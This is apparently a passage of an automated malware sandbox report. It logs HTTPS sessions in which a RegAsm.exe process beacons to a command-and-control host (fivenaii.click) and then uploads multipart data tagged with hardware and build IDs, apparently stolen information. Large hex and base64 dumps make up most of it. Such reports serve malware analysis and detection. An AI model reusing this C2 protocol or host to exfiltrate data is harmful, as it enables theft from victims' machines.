                                                                                              Data Ascii: U23tFO9GDrsTbRq1Nvd6HtcmHWp0CwuBD5/9pNRyNgEcaaMgoQEG7VBhJ7Ui40M27WczTlQ2T4soyvHQ3CJ/M1Eto1GvR171WG9Ssj2tHHCucU4+OVxfuGHG8/Kbajx2HDOjR68GHb8aJxGgL6p6HtskHGx4HBqoEeGm59U8aS5NYa1f4AFGlEhpUolirVxgpGoubmACCrE+kpTq3DN4KEsuo1GvR171Wm9Ssj2tHHCucU4+OVxfuGHG8/Kbajx
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 46 33 50 52 67 69 75 53 47 39 53 75 6d 79 31 42 43 48 32 4f 68 5a 69 61 55 41 4b 76 53 69 66 2f 61 54 56 63 6a 5a 34 58 53 76 7a 45 75 42 47 55 71 73 47 4c 31 4b 70 59 76 51 45 4e 72 78 79 53 43 4d 75 48 6b 33 2f 62 35 69 77 39 73 6b 30 62 53 35 66 5a 74 30 68 77 6c 4d 5a 76 51 74 6a 49 37 73 6f 2b 31 45 6a 37 43 30 6c 55 30 4d 65 43 72 63 73 6e 59 4c 79 32 44 4a 67 50 78 78 76 6f 77 65 76 47 56 36 41 47 69 59 43 74 57 79 6a 42 43 79 38 63 6c 74 67 66 41 73 64 70 47 50 59 71 65 4f 62 4c 53 41 68 48 44 65 6a 52 37 77 50 58 72 39 49 65 56 4c 78 49 75 42 46 49 2f 49 70 43 58 39 6f 44 78 75 6b 61 4f 47 4e 79 63 6b 31 66 6a 73 65 45 4f 34 62 2b 56 51 64 76 51 38 66 4c 4a 73 2b 36 6c 51 6a 76 67 59 63 59 47 49 79 4d 35 41 2b 32 4b 4f 6d 2f 54 46 34 4f 78 78 76
                                                                                              Data Ascii: F3PRgiuSG9Sumy1BCH2OhZiaUAKvSif/aTVcjZ4XSvzEuBGUqsGL1KpYvQENrxySCMuHk3/b5iw9sk0bS5fZt0hwlMZvQtjI7so+1Ej7C0lU0MeCrcsnYLy2DJgPxxvowevGV6AGiYCtWyjBCy8cltgfAsdpGPYqeObLSAhHDejR7wPXr9IeVLxIuBFI/IpCX9oDxukaOGNyck1fjseEO4b+VQdvQ8fLJs+6lQjvgYcYGIyM5A+2KOm/TF4Oxxv


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.449752104.21.60.244432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:15 UTC261OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-27 21:33:16 UTC1127INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:16 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=6eqjouvagg6mjrj14ouf43j6v5; expires=Tue, 22 Apr 2025 15:19:55 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H1exmNpDPvq3riogKFs2QZbU8G3sZcID%2BC4wcLe7Z3PZxMDMS9%2Bw00qrt4KzKOAI7QfdV1fAIlBWWp0bBjfZL6Plm39lymLWdkgtf3glV%2BGFrEFnTJW3OB%2B7y9rAFqG8aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d8f1f49c341-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1711&rtt_var=663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1625835&cwnd=177&unsent_bytes=0&cid=c82bc5d2793f187d&ts=776&x=0"
                                                                                              2024-12-27 21:33:16 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-27 21:33:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.449755104.21.60.244432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:17 UTC262OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 52
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:17 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=
                                                                                              2024-12-27 21:33:18 UTC1129INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:18 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=78av4f460367gec90vcedgokl0; expires=Tue, 22 Apr 2025 15:19:57 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pl%2FwCY0Mg7%2B3Gr5PIqMskF6CKOhh%2BXuZM3qelwh9BiNRjHmLUuuZN44BK1vlBrVVH7lwrtuVVgfcStU6TeklrNy7zJeMlLBtckFeilFrC7Ia0y8y%2BoI42jLx1NQmaHV%2Bng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d9bfa044316-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1674&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=950&delivery_rate=1625835&cwnd=177&unsent_bytes=0&cid=1ed3a6d43fc5e18a&ts=789&x=0"
                                                                                              2024-12-27 21:33:18 UTC240INData Raw: 63 34 63 0d 0a 67 71 6a 54 4c 54 4e 61 73 59 59 6c 57 6b 50 74 39 45 43 48 73 34 65 34 76 49 33 37 76 6d 75 38 43 6f 46 45 79 35 66 47 65 72 6a 35 69 71 55 50 43 57 36 64 70 46 59 2f 59 64 65 41 4d 76 4c 57 71 35 72 64 36 64 6d 45 44 64 31 6d 38 69 48 6e 74 62 41 58 6d 72 6a 4f 73 6b 46 41 50 35 32 6b 51 43 4a 68 31 36 38 37 70 64 62 70 6d 6f 61 76 6e 74 51 4a 33 57 62 6a 4a 61 44 34 74 68 62 62 36 73 53 30 52 56 59 35 31 65 64 4a 4e 79 61 49 6b 53 48 74 33 65 37 56 31 4f 44 5a 6b 6b 6e 5a 63 4b 4e 2b 36 64 71 6a 44 74 6e 50 79 61 42 47 45 53 65 64 2f 51 63 2f 4c 63 2f 4f 59 75 62 57 35 64 54 61 36 5a 44 57 41 39 52 75 34 69 43 68 35 36 38 63 30 4f 72 4b 74 30 52 63 4d 4d 48 71 51 7a 41 74 6a 70 73 68 70 5a 2b
                                                                                              Data Ascii: c4cgqjTLTNasYYlWkPt9ECHs4e4vI37vmu8CoFEy5fGerj5iqUPCW6dpFY/YdeAMvLWq5rd6dmEDd1m8iHntbAXmrjOskFAP52kQCJh1687pdbpmoavntQJ3WbjJaD4thbb6sS0RVY51edJNyaIkSHt3e7V1ODZkknZcKN+6dqjDtnPyaBGESed/Qc/Lc/OYubW5dTa6ZDWA9Ru4iCh568c0OrKt0RcMMHqQzAtjpshpZ+
                                                                                              2024-12-27 21:33:18 UTC1369INData Raw: 6c 33 63 61 76 77 5a 78 61 37 47 76 79 4e 37 7a 34 74 42 36 61 2f 34 53 6f 44 31 59 30 6b 37 77 48 4d 43 32 42 6b 79 48 71 31 75 54 61 7a 4f 43 5a 33 77 48 57 62 4f 6b 70 70 76 71 71 45 74 33 6f 77 37 5a 41 56 6a 44 56 36 30 52 34 62 38 2b 52 4f 71 57 4a 70 66 72 4f 37 4a 72 49 42 4d 38 6f 2f 47 69 77 74 61 4d 55 6d 72 69 4b 74 30 46 51 4e 64 50 32 54 7a 4d 71 69 6f 51 70 37 4e 7a 6f 32 74 50 6c 6c 74 38 4a 32 57 4c 70 4b 61 50 78 71 52 58 63 34 4d 72 78 41 52 45 2f 79 36 51 66 65 41 4b 4b 68 69 58 70 78 36 66 67 6e 76 44 58 78 55 6e 5a 5a 4b 4e 2b 36 66 32 68 47 39 6e 72 78 62 4a 48 57 69 72 54 39 6b 45 31 4a 4a 32 51 4a 2b 76 62 35 73 6a 55 34 5a 2f 66 41 4e 56 68 35 69 47 74 74 65 70 59 33 66 69 4b 36 51 39 77 4e 64 6a 6f 54 53 38 68 7a 34 6c 73 2f 4a
                                                                                              Data Ascii: l3cavwZxa7GvyN7z4tB6a/4SoD1Y0k7wHMC2BkyHq1uTazOCZ3wHWbOkppvqqEt3ow7ZAVjDV60R4b8+ROqWJpfrO7JrIBM8o/GiwtaMUmriKt0FQNdP2TzMqioQp7Nzo2tPllt8J2WLpKaPxqRXc4MrxARE/y6QfeAKKhiXpx6fgnvDXxUnZZKN+6f2hG9nrxbJHWirT9kE1JJ2QJ+vb5sjU4Z/fANVh5iGttepY3fiK6Q9wNdjoTS8hz4ls/J
                                                                                              2024-12-27 21:33:18 UTC1369INData Raw: 35 5a 2f 54 42 4e 49 6f 72 57 61 75 37 65 52 41 6d 73 72 4a 70 55 78 62 65 75 62 6e 53 54 59 6d 6d 64 59 39 71 38 69 6c 33 64 4b 76 77 5a 77 45 33 32 44 6c 4e 4b 62 34 70 78 62 55 37 38 2b 2b 52 31 45 34 33 75 46 44 4d 79 71 4d 6d 79 62 33 32 2b 58 53 32 2b 36 54 31 6b 6d 51 4b 4f 51 2b 36 61 33 6b 4b 63 33 72 69 49 52 4d 58 7a 62 55 38 67 63 6e 62 35 62 57 4a 65 6d 52 76 5a 72 54 35 35 7a 5a 42 74 39 69 37 53 4f 6a 2b 61 77 57 32 66 4c 46 74 55 39 64 4d 4e 6e 70 53 54 77 70 68 70 30 70 34 39 48 6b 30 4a 36 68 32 64 73 52 6e 6a 43 6a 45 71 37 35 71 52 65 59 31 63 6d 2f 51 56 59 75 6b 2f 73 4a 49 57 47 49 6d 6d 4b 39 6b 65 6e 54 33 75 53 54 32 41 6e 5a 5a 65 59 6c 72 76 61 70 48 39 44 75 7a 62 56 44 57 44 58 56 35 45 41 38 4a 4a 32 54 4b 2b 6e 64 70 5a 53
                                                                                              Data Ascii: 5Z/TBNIorWau7eRAmsrJpUxbeubnSTYmmdY9q8il3dKvwZwE32DlNKb4pxbU78++R1E43uFDMyqMmyb32+XS2+6T1kmQKOQ+6a3kKc3riIRMXzbU8gcnb5bWJemRvZrT55zZBt9i7SOj+awW2fLFtU9dMNnpSTwphp0p49Hk0J6h2dsRnjCjEq75qReY1cm/QVYuk/sJIWGImmK9kenT3uST2AnZZeYlrvapH9DuzbVDWDXV5EA8JJ2TK+ndpZS
                                                                                              2024-12-27 21:33:18 UTC177INData Raw: 30 66 48 4b 4f 51 71 36 61 33 6b 45 64 50 79 78 4c 39 47 58 44 37 62 34 30 6b 31 4b 6f 6d 64 4a 65 4c 58 36 4e 4c 54 36 70 72 64 44 64 52 36 34 43 32 6a 2b 4b 35 59 6c 4b 44 4e 71 51 38 4a 65 50 54 6f 62 69 67 36 6e 59 42 69 2b 70 2f 38 6d 74 6e 6a 32 59 52 4a 33 57 66 71 4b 61 48 39 71 78 66 65 37 73 79 33 51 6c 51 33 32 66 5a 50 4e 69 79 45 6d 53 6e 33 30 65 6a 65 30 75 75 52 31 77 4f 65 4a 71 4d 68 73 62 58 38 57 4f 2f 74 78 62 46 4d 52 33 6a 4d 71 6c 35 34 4a 6f 50 57 65 71 58 64 36 39 72 52 34 35 58 58 41 64 39 6b 0d 0a
                                                                                              Data Ascii: 0fHKOQq6a3kEdPyxL9GXD7b40k1KomdJeLX6NLT6prdDdR64C2j+K5YlKDNqQ8JePTobig6nYBi+p/8mtnj2YRJ3WfqKaH9qxfe7sy3QlQ32fZPNiyEmSn30eje0uuR1wOeJqMhsbX8WO/txbFMR3jMql54JoPWeqXd69rR45XXAd9k
                                                                                              2024-12-27 21:33:18 UTC1369INData Raw: 33 63 64 30 0d 0a 37 53 47 73 2f 4b 77 51 79 4f 48 4f 75 55 35 66 4e 39 4c 67 51 6a 30 6c 69 4a 49 6b 36 70 47 72 6d 74 6e 33 32 59 52 4a 38 55 2f 57 5a 49 6a 50 35 41 65 55 2b 59 71 32 51 78 46 67 6b 2b 68 45 4e 43 6d 41 6b 43 76 70 32 2b 7a 52 30 75 53 64 30 41 44 62 62 75 49 6a 72 50 53 67 46 4e 44 6d 79 62 4a 41 58 6a 66 62 70 41 6c 34 4a 70 66 57 65 71 58 30 38 74 48 51 36 64 6e 44 52 38 63 6f 35 43 72 70 72 65 51 55 30 2b 62 4d 74 45 4e 51 50 74 76 68 54 7a 77 67 69 5a 41 68 36 74 58 67 32 39 48 72 6c 64 49 44 33 32 6e 76 4c 61 62 2b 6f 56 69 55 6f 4d 32 70 44 77 6c 34 34 75 64 52 4c 7a 47 44 31 6a 32 72 79 4b 58 64 30 71 2f 42 6e 41 6a 4d 59 75 6b 6f 72 50 71 68 47 39 58 6e 78 37 64 44 57 7a 48 62 34 6b 67 78 4d 34 79 61 4c 4f 4c 66 36 64 54 54 35
                                                                                              Data Ascii: 3cd07SGs/KwQyOHOuU5fN9LgQj0liJIk6pGrmtn32YRJ8U/WZIjP5AeU+Yq2QxFgk+hENCmAkCvp2+zR0uSd0ADbbuIjrPSgFNDmybJAXjfbpAl4JpfWeqX08tHQ6dnDR8co5CrpreQU0+bMtENQPtvhTzwgiZAh6tXg29HrldID32nvLab+oViUoM2pDwl44udRLzGD1j2ryKXd0q/BnAjMYukorPqhG9Xnx7dDWzHb4kgxM4yaLOLf6dTT5
                                                                                              2024-12-27 21:33:18 UTC1369INData Raw: 58 59 2f 45 73 72 76 4b 76 45 4e 48 76 7a 4b 4e 44 58 79 72 57 39 6c 56 34 62 38 2b 52 4f 71 57 4a 70 65 7a 5a 2f 34 6e 66 53 2b 39 2b 34 44 43 69 2b 4b 68 59 78 61 37 54 38 55 68 64 65 49 75 6b 51 54 63 6f 6a 4a 6b 6a 37 4e 33 6f 33 39 66 71 6d 4e 6f 4e 31 47 4c 6a 49 4b 2f 30 6f 52 4c 5a 34 63 43 34 53 46 6b 2f 30 50 59 48 64 6d 47 49 6a 6d 4b 39 6b 63 7a 64 7a 4f 47 4a 6e 42 61 51 63 61 4d 68 70 62 58 38 57 4e 37 71 78 62 56 49 58 54 37 57 34 6b 6f 35 4c 6f 36 57 4c 65 48 61 37 4e 7a 66 34 70 7a 52 44 63 78 69 36 43 6d 6c 2f 4b 67 56 6d 71 36 4b 74 6c 63 52 59 4a 50 56 53 6a 59 76 69 49 42 69 2b 70 2f 38 6d 74 6e 6a 32 59 52 4a 33 32 54 73 4a 61 62 32 70 78 6e 51 38 74 69 39 52 6c 6b 39 33 2b 39 4a 50 6a 4f 4a 6d 53 76 6d 30 75 7a 64 31 75 4f 54 33 77
                                                                                              Data Ascii: XY/EsrvKvENHvzKNDXyrW9lV4b8+ROqWJpezZ/4nfS+9+4DCi+KhYxa7T8UhdeIukQTcojJkj7N3o39fqmNoN1GLjIK/0oRLZ4cC4SFk/0PYHdmGIjmK9kczdzOGJnBaQcaMhpbX8WN7qxbVIXT7W4ko5Lo6WLeHa7Nzf4pzRDcxi6Cml/KgVmq6KtlcRYJPVSjYviIBi+p/8mtnj2YRJ32TsJab2pxnQ8ti9Rlk93+9JPjOJmSvm0uzd1uOT3w
                                                                                              2024-12-27 21:33:18 UTC1369INData Raw: 66 72 2f 6c 73 78 2f 46 72 74 50 78 53 46 31 34 69 36 52 42 4d 53 65 49 6b 43 7a 33 31 4f 50 56 30 65 61 51 32 41 48 64 61 4f 63 69 72 76 43 6e 46 4e 48 6e 79 62 35 4c 57 44 62 61 36 77 64 32 59 59 69 4f 59 72 32 52 78 4d 48 64 34 35 53 63 46 70 42 78 6f 79 47 6c 74 66 78 59 31 75 37 50 73 55 56 58 50 4e 62 69 54 54 30 68 68 4a 55 74 34 64 66 68 31 64 37 6b 6b 4e 30 50 32 32 4c 6f 49 4b 54 32 6f 68 36 61 72 6f 71 32 56 78 46 67 6b 38 52 63 4e 53 32 49 31 6a 32 72 79 4b 58 64 30 71 2f 42 6e 41 4c 53 62 4f 51 6d 70 50 61 73 48 64 37 71 7a 37 46 48 51 7a 44 54 34 31 55 71 49 59 61 54 4c 75 62 52 34 64 7a 58 36 5a 72 59 53 5a 41 6f 35 44 37 70 72 65 51 31 31 75 66 6a 74 6c 51 52 4a 35 33 39 42 7a 38 74 7a 38 35 69 35 4e 72 76 31 64 50 73 6e 39 38 43 32 32 4c
                                                                                              Data Ascii: fr/lsx/FrtPxSF14i6RBMSeIkCz31OPV0eaQ2AHdaOcirvCnFNHnyb5LWDba6wd2YYiOYr2RxMHd45ScFpBxoyGltfxY1u7PsUVXPNbiTT0hhJUt4dfh1d7kkN0P22LoIKT2oh6aroq2VxFgk8RcNS2I1j2ryKXd0q/BnALSbOQmpPasHd7qz7FHQzDT41UqIYaTLubR4dzX6ZrYSZAo5D7preQ11ufjtlQRJ539Bz8tz85i5Nrv1dPsn98C22L
                                                                                              2024-12-27 21:33:18 UTC1369INData Raw: 62 4a 59 67 72 4b 45 38 56 30 52 59 4a 4f 6a 52 43 6f 7a 69 5a 55 30 35 70 62 62 35 50 6e 35 6b 39 73 5a 32 58 2f 73 5a 75 65 31 71 31 69 43 32 59 71 34 53 45 6f 70 78 65 6c 58 50 32 47 77 32 47 4c 39 6b 62 32 61 36 2b 79 58 30 67 37 49 65 61 34 42 76 2f 2b 6a 43 4e 33 33 78 66 45 42 45 54 36 54 76 42 52 32 59 59 75 48 59 72 32 42 74 34 47 4c 76 4d 36 4d 57 38 45 6d 2b 6d 61 2f 74 66 78 4b 6c 4b 44 59 38 52 63 52 66 39 44 32 56 54 34 69 6d 5a 56 6c 32 2b 2f 43 77 4e 50 70 6a 73 30 33 34 47 2f 35 4b 36 2f 69 74 56 54 50 34 38 53 2f 53 45 64 34 6e 61 52 49 65 48 6d 32 31 6d 71 6c 37 71 75 61 78 71 2f 42 6e 44 7a 64 5a 75 30 68 76 2b 54 70 50 38 44 74 7a 4b 5a 65 45 58 61 54 34 67 64 67 63 63 48 57 4a 76 53 52 76 59 71 4d 74 4d 79 50 58 6f 34 36 2f 47 69 77
                                                                                              Data Ascii: bJYgrKE8V0RYJOjRCoziZU05pbb5Pn5k9sZ2X/sZue1q1iC2Yq4SEopxelXP2Gw2GL9kb2a6+yX0g7Iea4Bv/+jCN33xfEBET6TvBR2YYuHYr2Bt4GLvM6MW8Em+ma/tfxKlKDY8RcRf9D2VT4imZVl2+/CwNPpjs034G/5K6/itVTP48S/SEd4naRIeHm21mql7quaxq/BnDzdZu0hv+TpP8DtzKZeEXaT4gdgccHWJvSRvYqMtMyPXo46/Giw
                                                                                              2024-12-27 21:33:18 UTC1369INData Raw: 54 75 7a 61 64 65 45 58 61 54 36 77 64 67 47 4d 2f 65 59 74 71 66 70 63 4b 65 74 39 6e 70 43 74 42 6d 35 44 43 34 75 49 4d 57 33 65 48 63 6f 56 68 65 65 4a 32 6b 51 58 68 35 33 64 68 69 34 63 43 6c 67 6f 36 39 77 6f 6c 61 69 54 69 78 4f 65 66 73 35 41 36 61 75 4a 6a 2f 44 30 4e 34 69 36 51 41 4f 7a 4f 64 6b 43 48 7a 30 71 4c 6b 34 4d 69 58 32 77 6a 49 65 50 51 70 35 74 75 53 4f 65 54 65 33 37 4a 42 58 7a 2f 46 39 51 64 32 59 59 44 57 65 74 79 52 72 5a 72 68 6f 64 6e 45 53 59 59 6f 31 69 57 6e 2b 36 4d 4f 79 36 33 74 76 30 68 51 4c 73 50 7a 53 48 63 50 75 62 64 69 71 35 48 6a 6d 6f 61 39 31 35 77 4e 7a 79 69 37 64 76 75 75 38 55 75 4e 73 4a 69 75 41 55 68 34 78 61 51 66 61 6d 2f 50 68 47 4b 39 6b 61 4c 5a 7a 50 32 66 33 78 2f 64 4c 39 30 59 6a 76 75 6a 47
                                                                                              Data Ascii: TuzadeEXaT6wdgGM/eYtqfpcKet9npCtBm5DC4uIMW3eHcoVheeJ2kQXh53dhi4cClgo69wolaiTixOefs5A6auJj/D0N4i6QAOzOdkCHz0qLk4MiX2wjIePQp5tuSOeTe37JBXz/F9Qd2YYDWetyRrZrhodnESYYo1iWn+6MOy63tv0hQLsPzSHcPubdiq5Hjmoa915wNzyi7dvuu8UuNsJiuAUh4xaQfam/PhGK9kaLZzP2f3x/dL90YjvujG


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.449757104.21.60.244437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:18 UTC280OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=K29GIXJ1E8TBCVOBTV
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18168
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:18 UTC15331OUTData Raw: 2d 2d 4b 32 39 47 49 58 4a 31 45 38 54 42 43 56 4f 42 54 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 32 39 47 49 58 4a 31 45 38 54 42 43 56 4f 42 54 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 32 39 47 49 58 4a 31 45 38 54 42 43 56 4f 42 54 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f
                                                                                              Data Ascii: --K29GIXJ1E8TBCVOBTVContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--K29GIXJ1E8TBCVOBTVContent-Disposition: form-data; name="pid"2--K29GIXJ1E8TBCVOBTVContent-Disposition: form-data; name="lid"VC6Dfm--TestO
                                                                                              2024-12-27 21:33:18 UTC2837OUTData Raw: 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62
                                                                                              Data Ascii: ,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pyb
                                                                                              2024-12-27 21:33:19 UTC1128INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:18 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=1qk4514vfes50pkibmf612jgua; expires=Tue, 22 Apr 2025 15:19:57 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O8L6psK490HzsIxGYZs9e9X8HABR1Bu4rPpY0cDg9LhXqqyIX7%2Bd4Kt8%2BX9tk9DlCMIJgpQ3Xiq59YLgbnOtpY2wiQ2g138T663F6CLxTHOwi0Q5eW6Yxmo9JpZP8fetdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d9d3d95429e-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1754&rtt_var=669&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19128&delivery_rate=1623123&cwnd=208&unsent_bytes=0&cid=ff79b5e6d84e2a6c&ts=1023&x=0"
                                                                                              2024-12-27 21:33:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.449759104.21.60.244437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:20 UTC280OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=6G55XVIVJGCYD2KDH6P
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8795
                                                                                              Host: fivenaii.click
